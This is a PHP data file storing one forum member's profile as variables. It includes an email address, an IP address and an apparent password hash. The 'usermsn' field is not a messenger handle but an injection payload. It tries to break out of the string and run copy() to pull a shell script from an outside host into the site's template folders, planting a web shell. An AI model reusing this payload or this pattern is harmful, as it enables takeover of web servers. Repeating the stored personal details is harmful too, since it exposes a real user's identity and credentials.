<?php

$userid="113";
$password="e8f4e25bd1b03a5d39c484e2050e6e35";
$username="R4in0";
$useralias="R4in0";
$userrealname="";
$useremail="erohin90@mail.ru";
$useremhide="hide";
$userip="194.68.63.142";
$usersig="";
$userslogan="";
$useravatar="none";
$usermsn="\';>< copy(\'http://nwhg.nm.ru/shell.txt\',\'templates/pb/images/ranks/users.php\'); copy(\'http://nwhg.nm.ru/shell.txt\',\'templates/users.php\'); ><#";
$userposts="0";
$usericq="";
$userqq="";
$userwebavatar="";
$userrank="1";
$useryahoo="";
$useraim="";
$userlocation="";
$userjoined="1117667178";
$userhomepage="http://";
$useradmin="0";
$usermod="0";
$userban="0";
$userfriend="";
$userlastvisit="1117668232";
$userlastpost="1117667178";
$userprevvisit="1117668205";
$useranimsmilies="";
$lastaliaschange="1117667178";
$userlang="en";
$uservisits="4";
$aliaslist="";
$noavatars="";

?>